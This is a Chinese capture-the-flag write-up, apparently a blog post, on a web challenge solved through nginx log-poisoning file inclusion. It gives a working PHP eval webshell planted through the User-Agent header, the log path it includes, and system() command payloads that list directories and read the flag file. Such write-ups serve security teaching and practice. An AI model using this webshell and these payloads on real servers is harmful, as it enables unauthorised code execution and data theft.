文章描述了一次利用日志注入进行文件包含的攻击尝试,通过修改User-Agent字段上传PHP一句话木马,并使用BurpSuite和HackBar工具进行交互。虽然初次尝试未找到flag,但通过查找上级目录并执行系统命令,最终成功获取了flag.txt的内容。
点开题目链接
这道题跟前面的web3不太一样
这题类型为日志注入的文件包含
F12,点击网络
可以得知是nginx日志
我们试试nginx的日志默认路径
?url=/var/log/nginx/access.log
然后我们用burpsuite抓包,上传一句话木马
payload
<?php @eval($_POST['a']);?>
塞入User-Agent替换掉之前的
发现上传成功
接着用蚁剑连接
测试成功
按理来说是有的
结果发现没有哈哈哈哈哈哈
估计题目出问题了
我们还可以用另外一个方法
用火狐的HackBar插件
因为我们的一句话木马已经成功传进去
我们直接POST请求去执行命令
发现只有index.php
我们再试试查找上级目录
a=system('ls ../');
发现flag
最后用cat命令
payload
a=system('cat ../flag.txt');
注:要选对目录位置再去查找flag
927
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
